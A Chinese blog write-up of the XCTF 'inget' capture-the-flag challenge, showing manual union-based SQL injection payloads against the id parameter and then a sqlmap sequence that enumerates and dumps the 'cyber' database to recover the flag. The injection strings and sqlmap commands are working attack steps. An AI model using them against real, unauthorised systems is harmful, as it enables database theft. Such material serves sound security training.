记攻防世界里的一次SQL注入

攻防世界的inget SQL注入

在这里插入图片描述

打开场景

在这里插入图片描述

文中翻译过来就是让我绕过ID 感觉有点SQL注入的感觉

先一个个试试

在这里插入图片描述

?id=1'union select 1,2 --+

发现确实存在SQL注入

懂了 先手工测测,能手工就手工,最后再跑sqlmap验证

在这里插入图片描述

?id=1' union select 1,database()--+

直接爆出来数据库名 cyber

这就好办了,利用 group_concat()

在这里插入图片描述

?id=1' union select 2,group_concat(table_name) from information_schema.tables where table_schema = 'cyber'--+

发现爆出来表还是cyber

继续利用 爆出字段

在这里插入图片描述

?id=1' union select 2,group_concat(column_name) from information_schema.columns where table_schema = 'cyber'--+

发现爆出来三个字段

不用想 以攻防世界的尿性flag肯定在pw字段

直接查看

在这里插入图片描述

直接得到flag

下面使用sqlmap直接跑出来flag

在这里插入图片描述

python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -dbs

利用这个跑出数据库

在这里插入图片描述

发现跑出来了数据库 cyber

继续

在这里插入图片描述

python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber --tables

跑出表

在这里插入图片描述

发现跑出了表cyber

继续

在这里插入图片描述

python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber -T cyber --columns

跑出字段

在这里插入图片描述

查看

在这里插入图片描述

python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber -T cyber -C pw --dump

在这里插入图片描述

ok 得到了字段内容 也就得到了flag 新手做CTF的时候最好不要一开始就用sqlmap,最好自己手工注入

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值